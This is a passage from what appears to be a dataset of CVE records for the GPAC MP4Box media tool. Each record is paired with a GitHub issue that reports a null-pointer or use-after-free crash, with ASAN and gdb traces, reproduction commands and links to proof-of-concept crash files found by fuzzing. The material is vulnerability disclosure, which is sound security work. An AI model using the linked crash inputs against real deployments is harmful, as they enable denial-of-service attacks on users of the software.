isomedia/box_funcs.c:208 #6 0x6c47bc in gf_isom_box_array_read_ex isomedia/box_funcs.c:1419 #7 0x6c3d6e in gf_isom_box_read isomedia/box_funcs.c:1528 #8 0x6c3d6e in gf_isom_box_parse_ex isomedia/box_funcs.c:208 #9 0x6c47bc in gf_isom_box_array_read_ex isomedia/box_funcs.c:1419 #10 0xae19df in stbl_Read isomedia/box_code_base.c:5381 #11 0x6c3d6e in gf_isom_box_read isomedia/box_funcs.c:1528 #12 0x6c3d6e in gf_isom_box_parse_ex isomedia/box_funcs.c:208 #13 0x6c47bc in gf_isom_box_array_read_ex isomedia/box_funcs.c:1419 #14 0xadb4fe in minf_Read isomedia/box_code_base.c:3500 #15 0x6c3d6e in gf_isom_box_read isomedia/box_funcs.c:1528 #16 0x6c3d6e in gf_isom_box_parse_ex isomedia/box_funcs.c:208 #17 0x6c47bc in gf_isom_box_array_read_ex isomedia/box_funcs.c:1419 #18 0xad96ef in mdia_Read isomedia/box_code_base.c:3021 #19 0x6c3d6e in gf_isom_box_read isomedia/box_funcs.c:1528 #20 0x6c3d6e in gf_isom_box_parse_ex isomedia/box_funcs.c:208 #21 0x6c47bc in gf_isom_box_array_read_ex isomedia/box_funcs.c:1419 #22 0xae8ad8 in trak_Read isomedia/box_code_base.c:7129 #23 0x6c3d6e in gf_isom_box_read isomedia/box_funcs.c:1528 #24 0x6c3d6e in gf_isom_box_parse_ex isomedia/box_funcs.c:208 #25 0x6c47bc in gf_isom_box_array_read_ex isomedia/box_funcs.c:1419 #26 0xadc064 in moov_Read isomedia/box_code_base.c:3745 #27 0x6c5114 in gf_isom_box_read isomedia/box_funcs.c:1528 #28 0x6c5114 in gf_isom_box_parse_ex isomedia/box_funcs.c:208 #29 0x6c5974 in gf_isom_parse_root_box isomedia/box_funcs.c:42 #30 0x6da6a0 in gf_isom_parse_movie_boxes isomedia/isom_intern.c:206 #31 0x6dd2f3 in gf_isom_parse_movie_boxes isomedia/isom_intern.c:194 #32 0x6dd2f3 in gf_isom_open_file isomedia/isom_intern.c:615 #33 0x42f88a in mp4boxMain /home/aota09/yyp/fuzzcompare/test/gpac/test-crash/build_asan_00dfc93/applications/mp4box/main.c:4767 #34 0x7ffff638082f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f) #35 0x41e228 in _start (/home/aota09/yyp/fuzzcompare/test/gpac/test-crash/bin_asan/bin/MP4Box+0x41e228) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV odf/descriptors.c:567 gf_odf_avc_cfg_write_bs ==25871==ABORTING ``` --- Edit This bug issue still exists in latest version 0.8.0: 4c19ae5 and 0.9.0: 1de1f8d --- Addition: This bug was found with our fuzzer, which is based on AFL. Our fuzzer is developed by Yuanpingyu(cfenicey@gmail.com) 、Yanhao and Marsman1996(lqliuyuwei@outlook.com)
AddressSanitizer: NULL pointer dereference in gf_odf_avc_cfg_write_bs odf/descriptors.c:567
https://api.github.com/repos/gpac/gpac/issues/1335/comments
2
2019-11-09T11:23:01Z
2020-01-08T12:45:23Z
https://github.com/gpac/gpac/issues/1335
520,395,160
1,335
958
CVE-2019-20164
2019-12-31T00:15:12.667
An issue was discovered in GPAC version 0.8.0 and 0.9.0-development-20191109. There is a NULL pointer dereference in the function gf_isom_box_del() in isomedia/box_funcs.c.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/1332" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/1332" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gpac:gpac:0.8.0:*:*:*:*:*:*:*", "matchCriteriaId": "93EEFCFD-7417-40E6-84BF-4EA630F2A8A1", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:gpac:gpac:0.9.0:*:*:*:*:*:*:*", "matchCriteriaId": "1EA85977-716F-48A1-8199-B8A7847AF223", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "476" ]
476
https://github.com/gpac/gpac/issues/1332
[ "Exploit", "Third Party Advisory" ]
github.com
[ "gpac", "gpac" ]
System info: Ubuntu 16.04.6 LTS, X64, gcc 5.4.0, gpac (latest master 00dfc93) Compile Command: ``` $ CC="gcc -fsanitize=address -g" CXX="g++ -fsanitize=address -g" ./configure --static-mp4box $ make ``` Run Command: ``` $ MP4Box -diso -out /dev/null $POC-new-gf_isom_box_del ``` POC file: https://github.com/Clingto/POC/blob/master/gpac-MP4Box/gpac-00dfc93-crashes/POC-new-gf_isom_box_del gdb info: ```C Error in /bin/MP4Box: free(): invalid next size (fast): 0x00000000009cc5a0 ======= Backtrace: ========= /lib/x86_64-linux-gnu/libc.so.6(+0x777e5)[0x7ffff73447e5] /lib/x86_64-linux-gnu/libc.so.6(+0x8037a)[0x7ffff734d37a] /lib/x86_64-linux-gnu/libc.so.6(cfree+0x4c)[0x7ffff735153c] /lib/x86_64-linux-gnu/libc.so.6(__libc_start_main+0xf0)[0x7ffff72ed830] ======= Memory map: ======== 009c8000-009ec000 rw-p 00000000 00:00 0 [heap] 7ffff0000000-7ffff0021000 rw-p 00000000 00:00 0 7ffff0021000-7ffff4000000 ---p 00000000 00:00 0 7ffff70b7000-7ffff70cd000 r-xp 00000000 08:02 67633677 /lib/x86_64-linux-gnu/libgcc_s.so.1 7ffff70cd000-7ffff72cc000 ---p 00016000 08:02 67633677 /lib/x86_64-linux-gnu/libgcc_s.so.1 7ffff72cc000-7ffff72cd000 rw-p 00015000 08:02 67633677 /lib/x86_64-linux-gnu/libgcc_s.so.1 7ffff72cd000-7ffff748d000 r-xp 00000000 08:02 67637542 /lib/x86_64-linux-gnu/libc-2.23.so 7ffff748d000-7ffff768d000 ---p 001c0000 08:02 67637542 /lib/x86_64-linux-gnu/libc-2.23.so 7ffff768d000-7ffff7691000 r--p 001c0000 08:02 67637542 /lib/x86_64-linux-gnu/libc-2.23.so 7ffff7691000-7ffff7693000 rw-p 001c4000 08:02 67637542 /lib/x86_64-linux-gnu/libc-2.23.so 7ffff7693000-7ffff7697000 rw-p 00000000 00:00 0 7ffff7697000-7ffff76b0000 r-xp 00000000 08:02 67633774 /lib/x86_64-linux-gnu/libz.so.1.2.8 7ffff76b0000-7ffff78af000 ---p 00019000 08:02 67633774 /lib/x86_64-linux-gnu/libz.so.1.2.8 7ffff78af000-7ffff78b0000 r--p 00018000 08:02 67633774 /lib/x86_64-linux-gnu/libz.so.1.2.8 7ffff78b0000-7ffff78b1000 rw-p 00019000 08:02 67633774 /lib/x86_64-linux-gnu/libz.so.1.2.8 7ffff78b1000-7ffff79b9000 r-xp 00000000 08:02 67637545 /lib/x86_64-linux-gnu/libm-2.23.so 7ffff79b9000-7ffff7bb8000 ---p 00108000 08:02 67637545 /lib/x86_64-linux-gnu/libm-2.23.so 7ffff7bb8000-7ffff7bb9000 r--p 00107000 08:02 67637545 /lib/x86_64-linux-gnu/libm-2.23.so 7ffff7bb9000-7ffff7bba000 rw-p 00108000 08:02 67637545 /lib/x86_64-linux-gnu/libm-2.23.so 7ffff7bba000-7ffff7bd2000 r-xp 00000000 08:02 67637529 /lib/x86_64-linux-gnu/libpthread-2.23.so 7ffff7bd2000-7ffff7dd1000 ---p 00018000 08:02 67637529 /lib/x86_64-linux-gnu/libpthread-2.23.so 7ffff7dd1000-7ffff7dd2000 r--p 00017000 08:02 67637529 /lib/x86_64-linux-gnu/libpthread-2.23.so 7ffff7dd2000-7ffff7dd3000 rw-p 00018000 08:02 67637529 /lib/x86_64-linux-gnu/libpthread-2.23.so 7ffff7dd3000-7ffff7dd7000 rw-p 00000000 00:00 0 7ffff7dd7000-7ffff7dfd000 r-xp 00000000 08:02 67637528 /lib/x86_64-linux-gnu/ld-2.23.so 7ffff7fdf000-7ffff7fe4000 rw-p 00000000 00:00 0 7ffff7ff7000-7ffff7ff8000 rw-p 00000000 00:00 0 7ffff7ff8000-7ffff7ffa000 r--p 00000000 00:00 0 [vvar] 7ffff7ffa000-7ffff7ffc000 r-xp 00000000 00:00 0 [vdso] 7ffff7ffc000-7ffff7ffd000 r--p 00025000 08:02 67637528 /lib/x86_64-linux-gnu/ld-2.23.so 7ffff7ffd000-7ffff7ffe000 rw-p 00026000 08:02 67637528 /lib/x86_64-linux-gnu/ld-2.23.so 7ffff7ffe000-7ffff7fff000 rw-p 00000000 00:00 0 7ffffffde000-7ffffffff000 rw-p 00000000 00:00 0 [stack] ffffffffff600000-ffffffffff601000 r-xp 00000000 00:00 0 [vsyscall] Program received signal SIGABRT, Aborted. 0x00007ffff7302428 in __GI_raise (sig=sig@entry=6) at ../sysdeps/unix/sysv/linux/raise.c:54 54 ../sysdeps/unix/sysv/linux/raise.c: No such file or directory. (gdb) bt #0 0x00007ffff7302428 in __GI_raise (sig=sig@entry=6) at ../sysdeps/unix/sysv/linux/raise.c:54 #1 0x00007ffff730402a in __GI_abort () at abort.c:89 #2 0x00007ffff73447ea in __libc_message (do_abort=do_abort@entry=2, fmt=fmt@entry=0x7ffff745ded8 "*** Error in `%s': %s: 0x%s ***\n") at ../sysdeps/posix/libc_fatal.c:175 #3 0x00007ffff734d37a in malloc_printerr (ar_ptr=<optimized out>, ptr=<optimized out>, str=0x7ffff745df50 "free(): invalid next size (fast)", action=3) at malloc.c:5006 #4 _int_free (av=<optimized out>, p=<optimized out>, have_lock=0) at malloc.c:3867 #5 0x00007ffff735153c in __GI___libc_free (mem=<optimized out>) at malloc.c:2968 #6 0x0000000000512a7d in gf_isom_box_del () #7 0x0000000000513810 in gf_isom_box_parse_ex.constprop () #8 0x0000000000513e15 in gf_isom_parse_root_box () #9 0x000000000051b4fe in gf_isom_parse_movie_boxes.part () #10 0x000000000051c48c in gf_isom_open_file () #11 0x000000000041c082 in mp4boxMain () #12 0x00007ffff72ed830 in __libc_start_main (main=0x40eb70 <main>, argc=5, argv=0x7fffffffe318, init=<optimized out>, fini=<optimized out>, rtld_fini=<optimized out>, stack_end=0x7fffffffe308) at ../csu/libc-start.c:291 #13 0x000000000040eba9 in _start () ``` ASAN info: ```C ASAN:SIGSEGV ================================================================= ==27733==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x0000006c3869 bp 0x60200000eff0 sp 0x7fffffff8560 T0) #0 0x6c3868 in gf_isom_box_del isomedia/box_funcs.c:1500 #1 0x6c3a06 in gf_isom_box_array_del isomedia/box_funcs.c:270 #2 0x6dce18 in gf_isom_delete_movie isomedia/isom_intern.c:657 #3 0x6dd32b in gf_isom_open_file isomedia/isom_intern.c:624 #4 0x42f88a in mp4boxMain /home/aota09/yyp/fuzzcompare/test/gpac/test-crash/build_asan_00dfc93/applications/mp4box/main.c:4767 #5 0x7ffff638082f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f) #6 0x41e228 in _start (/home/aota09/yyp/fuzzcompare/test/gpac/test-crash/bin_asan/bin/MP4Box+0x41e228) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV isomedia/box_funcs.c:1500 gf_isom_box_del ==27733==ABORTING ``` --- Edit This bug issue still exists in latest version 0.8.0: 4c19ae5 and 0.9.0: 1de1f8d asan ``` [iso file] Movie fragment but no moov (yet) - possibly broken parsing! [isom] not enough bytes in box tenc: 0 left, reading 139 (file isomedia/box_code_drm.c, line 1001) [iso file] Read Box "tenc" (start 8) failed (Invalid IsoMedia File) - skipping ASAN:SIGSEGV ================================================================= ==7918==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x0000006c45d9 bp 0x60200000eff0 sp 0x7fffffff8530 T0) #0 0x6c45d8 in gf_isom_box_del isomedia/box_funcs.c:1501 #1 0x6c4776 in gf_isom_box_array_del isomedia/box_funcs.c:270 #2 0x6de7d8 in gf_isom_delete_movie isomedia/isom_intern.c:657 #3 0x6deceb in gf_isom_open_file isomedia/isom_intern.c:624 #4 0x42f93d in mp4boxMain /home/aota09/yyp/fuzzcompare/test/gpac/test-crash/build_asan_1de1f8d-0.9/applications/mp4box/main.c:4789 #5 0x7ffff638082f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f) #6 0x41e278 in _start (/home/aota09/yyp/fuzzcompare/test/gpac/test-crash/bin_asan_1de1f8d-0.9/bin/MP4Box+0x41e278) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV isomedia/box_funcs.c:1501 gf_isom_box_del ``` --- Addition: This bug was found with our fuzzer, which is based on AFL. Our fuzzer is developed by Yuanpingyu(cfenicey@gmail.com) 、Yanhao and Marsman1996(lqliuyuwei@outlook.com) asan: ``` ==23293==ERROR: AddressSanitizer: heap-use-after-free on address 0x60600000eeb8 at pc 0x0000006d2f36 bp 0x7ffc000b4c30 sp 0x7ffc000b4c20 READ of size 8 at 0x60600000eeb8 thread T0 #0 0x6d2f35 in gf_isom_box_del isomedia/box_funcs.c:1501 #1 0x6d2e5e in gf_isom_box_array_del isomedia/box_funcs.c:270 #2 0x6d2e5e in gf_isom_box_del isomedia/box_funcs.c:1517 #3 0x6d2e5e in gf_isom_box_array_del isomedia/box_funcs.c:270 #4 0x6d2e5e in gf_isom_box_del isomedia/box_funcs.c:1517 #5 0x6d2e5e in gf_isom_box_array_del isomedia/box_funcs.c:270 #6 0x6d2e5e in gf_isom_box_del isomedia/box_funcs.c:1517 #7 0x6d2e5e in gf_isom_box_array_del isomedia/box_funcs.c:270 #8 0x6d2e5e in gf_isom_box_del isomedia/box_funcs.c:1517 #9 0x6d4300 in gf_isom_box_array_read_ex isomedia/box_funcs.c:1422 #10 0xb17c35 in moov_Read isomedia/box_code_base.c:3745 #11 0x6d4817 in gf_isom_box_read isomedia/box_funcs.c:1529 #12 0x6d4817 in gf_isom_box_parse_ex isomedia/box_funcs.c:208 #13 0x6d51c7 in gf_isom_parse_root_box isomedia/box_funcs.c:42 #14 0x6eb4fb in gf_isom_parse_movie_boxes isomedia/isom_intern.c:206 #15 0x6ee2a2 in gf_isom_parse_movie_boxes isomedia/isom_intern.c:194 #16 0x6ee2a2 in gf_isom_open_file isomedia/isom_intern.c:615 #17 0x431899 in mp4boxMain /home/aota05/yyp/fuzzsequence/test/gpac_4c19ae5/SRC_asan/applications/mp4box/main.c:4789 #18 0x7f49dcbd882f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f) #19 0x41f648 in _start (/home/aota05/yyp/fuzzsequence/test/gpac_4c19ae5/SRC_asan/build/bin/MP4Box+0x41f648) 0x60600000eeb8 is located 24 bytes inside of 56-byte region [0x60600000eea0,0x60600000eed8) freed by thread T0 here: #0 0x7f49dd75a2ca in __interceptor_free (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x982ca) #1 0x6d2ea7 in gf_isom_box_del isomedia/box_funcs.c:1509 #2 0xb052ef in stbl_AddBox isomedia/box_code_base.c:5314 #3 0x6d3f11 in gf_isom_box_array_read_ex isomedia/box_funcs.c:1472 #4 0xb1d707 in stbl_Read isomedia/box_code_base.c:5381 #5 0x6d333e in gf_isom_box_read isomedia/box_funcs.c:1529 #6 0x6d333e in gf_isom_box_parse_ex isomedia/box_funcs.c:208 #7 0x6d3e2a in gf_isom_box_array_read_ex isomedia/box_funcs.c:1420 #8 0xb1701a in minf_Read isomedia/box_code_base.c:3500 #9 0x6d333e in gf_isom_box_read isomedia/box_funcs.c:1529 #10 0x6d333e in gf_isom_box_parse_ex isomedia/box_funcs.c:208 #11 0x6d3e2a in gf_isom_box_array_read_ex isomedia/box_funcs.c:1420 #12 0xb15187 in mdia_Read isomedia/box_code_base.c:3021 #13 0x6d333e in gf_isom_box_read isomedia/box_funcs.c:1529 #14 0x6d333e in gf_isom_box_parse_ex isomedia/box_funcs.c:208 #15 0x6d3e2a in gf_isom_box_array_read_ex isomedia/box_funcs.c:1420 #16 0xb249cd in trak_Read isomedia/box_code_base.c:7134 #17 0x6d333e in gf_isom_box_read isomedia/box_funcs.c:1529 #18 0x6d333e in gf_isom_box_parse_ex isomedia/box_funcs.c:208 #19 0x6d3e2a in gf_isom_box_array_read_ex isomedia/box_funcs.c:1420 #20 0xb17c35 in moov_Read isomedia/box_code_base.c:3745 #21 0x6d4817 in gf_isom_box_read isomedia/box_funcs.c:1529 #22 0x6d4817 in gf_isom_box_parse_ex isomedia/box_funcs.c:208 #23 0x6d51c7 in gf_isom_parse_root_box isomedia/box_funcs.c:42 #24 0x6eb4fb in gf_isom_parse_movie_boxes isomedia/isom_intern.c:206 #25 0x6ee2a2 in gf_isom_parse_movie_boxes isomedia/isom_intern.c:194 #26 0x6ee2a2 in gf_isom_open_file isomedia/isom_intern.c:615 #27 0x431899 in mp4boxMain /home/aota05/yyp/fuzzsequence/test/gpac_4c19ae5/SRC_asan/applications/mp4box/main.c:4789 #28 0x7f49dcbd882f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f) previously allocated by thread T0 here: #0 0x7f49dd75a602 in malloc (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x98602) #1 0xb1e93d in stco_New isomedia/box_code_base.c:5616 #2 0x6d28d8 in gf_isom_box_new_ex isomedia/box_funcs.c:1385 #3 0x6d31ae in gf_isom_box_parse_ex isomedia/box_funcs.c:182 #4 0x6d3e2a in gf_isom_box_array_read_ex isomedia/box_funcs.c:1420 #5 0xb1d707 in stbl_Read isomedia/box_code_base.c:5381 #6 0x6d333e in gf_isom_box_read isomedia/box_funcs.c:1529 #7 0x6d333e in gf_isom_box_parse_ex isomedia/box_funcs.c:208 #8 0x6d3e2a in gf_isom_box_array_read_ex isomedia/box_funcs.c:1420 #9 0xb1701a in minf_Read isomedia/box_code_base.c:3500 #10 0x6d333e in gf_isom_box_read isomedia/box_funcs.c:1529 #11 0x6d333e in gf_isom_box_parse_ex isomedia/box_funcs.c:208 #12 0x6d3e2a in gf_isom_box_array_read_ex isomedia/box_funcs.c:1420 #13 0xb15187 in mdia_Read isomedia/box_code_base.c:3021 #14 0x6d333e in gf_isom_box_read isomedia/box_funcs.c:1529 #15 0x6d333e in gf_isom_box_parse_ex isomedia/box_funcs.c:208 #16 0x6d3e2a in gf_isom_box_array_read_ex isomedia/box_funcs.c:1420 #17 0xb249cd in trak_Read isomedia/box_code_base.c:7134 #18 0x6d333e in gf_isom_box_read isomedia/box_funcs.c:1529 #19 0x6d333e in gf_isom_box_parse_ex isomedia/box_funcs.c:208 #20 0x6d3e2a in gf_isom_box_array_read_ex isomedia/box_funcs.c:1420 #21 0xb17c35 in moov_Read isomedia/box_code_base.c:3745 #22 0x6d4817 in gf_isom_box_read isomedia/box_funcs.c:1529 #23 0x6d4817 in gf_isom_box_parse_ex isomedia/box_funcs.c:208 #24 0x6d51c7 in gf_isom_parse_root_box isomedia/box_funcs.c:42 #25 0x6eb4fb in gf_isom_parse_movie_boxes isomedia/isom_intern.c:206 #26 0x6ee2a2 in gf_isom_parse_movie_boxes isomedia/isom_intern.c:194 #27 0x6ee2a2 in gf_isom_open_file isomedia/isom_intern.c:615 #28 0x431899 in mp4boxMain /home/aota05/yyp/fuzzsequence/test/gpac_4c19ae5/SRC_asan/applications/mp4box/main.c:4789 #29 0x7f49dcbd882f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f) ```
AddressSanitizer: NULL pointer dereference (use-after-free ) in gf_isom_box_del isomedia/box_funcs.c:1500
https://api.github.com/repos/gpac/gpac/issues/1332/comments
2
2019-11-09T11:19:52Z
2022-01-26T08:36:22Z
https://github.com/gpac/gpac/issues/1332
520,394,510
1,332
959
CVE-2019-20165
2019-12-31T00:15:12.743
An issue was discovered in GPAC version 0.8.0 and 0.9.0-development-20191109. There is a NULL pointer dereference in the function ilst_item_Read() in isomedia/box_code_apple.c.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/1338" }, { "source": "cve@mitre.org", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://lists.debian.org/debian-lts-announce/2020/01/msg00017.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/1338" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://lists.debian.org/debian-lts-announce/2020/01/msg00017.html" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gpac:gpac:0.8.0:*:*:*:*:*:*:*", "matchCriteriaId": "93EEFCFD-7417-40E6-84BF-4EA630F2A8A1", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:gpac:gpac:0.9.0:*:*:*:*:*:*:*", "matchCriteriaId": "1EA85977-716F-48A1-8199-B8A7847AF223", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*", "matchCriteriaId": "C11E6FB0-C8C0-4527-9AA0-CB9B316F8F43", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "476" ]
476
https://github.com/gpac/gpac/issues/1338
[ "Exploit", "Third Party Advisory" ]
github.com
[ "gpac", "gpac" ]
Hello, I found a similar issue but I am not sure they are the same. https://github.com/gpac/gpac/issues/1263 System info: Ubuntu 16.04.6 LTS, X64, gcc 5.4.0, gpac (latest master 00dfc93) Compile Command: ``` $ CC="gcc -fsanitize=address -g" CXX="g++ -fsanitize=address -g" ./configure --static-mp4box $ make ``` Run Command: ``` $ MP4Box -diso -out /dev/null $POC-new-ilst_item_Read ``` POC file: https://github.com/Clingto/POC/blob/master/gpac-MP4Box/gpac-00dfc93-crashes/POC-new-ilst_item_Read gdb info: ```C Program received signal SIGSEGV, Segmentation fault. 0x00000000006c499d in ilst_item_Read () (gdb) bt #0 0x00000000006c499d in ilst_item_Read () #1 0x00000000005137e1 in gf_isom_box_parse_ex.constprop () #2 0x0000000000513e15 in gf_isom_parse_root_box () #3 0x000000000051b4fe in gf_isom_parse_movie_boxes.part () #4 0x000000000051c48c in gf_isom_open_file () #5 0x000000000041c082 in mp4boxMain () #6 0x00007ffff72ed830 in __libc_start_main (main=0x40eb70 <main>, argc=5, argv=0x7fffffffe318, init=<optimized out>, fini=<optimized out>, rtld_fini=<optimized out>, stack_end=0x7fffffffe308) at ../csu/libc-start.c:291 #7 0x000000000040eba9 in _start () ``` ASAN info: ```C ASAN:SIGSEGV ================================================================= ==27902==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000008 (pc 0x000000ac4185 bp 0x7fffffff8230 sp 0x7fffffff8220 T0) #0 0xac4184 in ilst_item_Read isomedia/box_code_apple.c:119 #1 0x6c5114 in gf_isom_box_read isomedia/box_funcs.c:1528 #2 0x6c5114 in gf_isom_box_parse_ex isomedia/box_funcs.c:208 #3 0x6c5974 in gf_isom_parse_root_box isomedia/box_funcs.c:42 #4 0x6da6a0 in gf_isom_parse_movie_boxes isomedia/isom_intern.c:206 #5 0x6dd2f3 in gf_isom_parse_movie_boxes isomedia/isom_intern.c:194 #6 0x6dd2f3 in gf_isom_open_file isomedia/isom_intern.c:615 #7 0x42f88a in mp4boxMain /home/aota09/yyp/fuzzcompare/test/gpac/test-crash/build_asan_00dfc93/applications/mp4box/main.c:4767 #8 0x7ffff638082f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f) #9 0x41e228 in _start (/home/aota09/yyp/fuzzcompare/test/gpac/test-crash/bin_asan/bin/MP4Box+0x41e228) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV isomedia/box_code_apple.c:119 ilst_item_Read ==27902==ABORTING ``` --- Edit This bug issue still exists in latest version 0.8.0: 4c19ae5 and 0.9.0: 1de1f8d --- Addition: This bug was found with our fuzzer, which is based on AFL. Our fuzzer is developed by Yuanpingyu(cfenicey@gmail.com) 、Yanhao and Marsman1996(lqliuyuwei@outlook.com)
ERROR: AddressSanitizer: NULL pointer dereference in ilst_item_Read isomedia/box_code_apple.c:119
https://api.github.com/repos/gpac/gpac/issues/1338/comments
4
2019-11-09T12:06:24Z
2020-01-08T12:45:38Z
https://github.com/gpac/gpac/issues/1338
520,405,629
1,338
960
CVE-2019-20166
2019-12-31T00:15:12.837
An issue was discovered in GPAC version 0.8.0 and 0.9.0-development-20191109. There is a NULL pointer dereference in the function gf_isom_dump() in isomedia/box_dump.c.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/1331" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/1331" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gpac:gpac:0.8.0:*:*:*:*:*:*:*", "matchCriteriaId": "93EEFCFD-7417-40E6-84BF-4EA630F2A8A1", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:gpac:gpac:0.9.0:*:*:*:*:*:*:*", "matchCriteriaId": "1EA85977-716F-48A1-8199-B8A7847AF223", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "476" ]
476
https://github.com/gpac/gpac/issues/1331
[ "Exploit", "Third Party Advisory" ]
github.com
[ "gpac", "gpac" ]
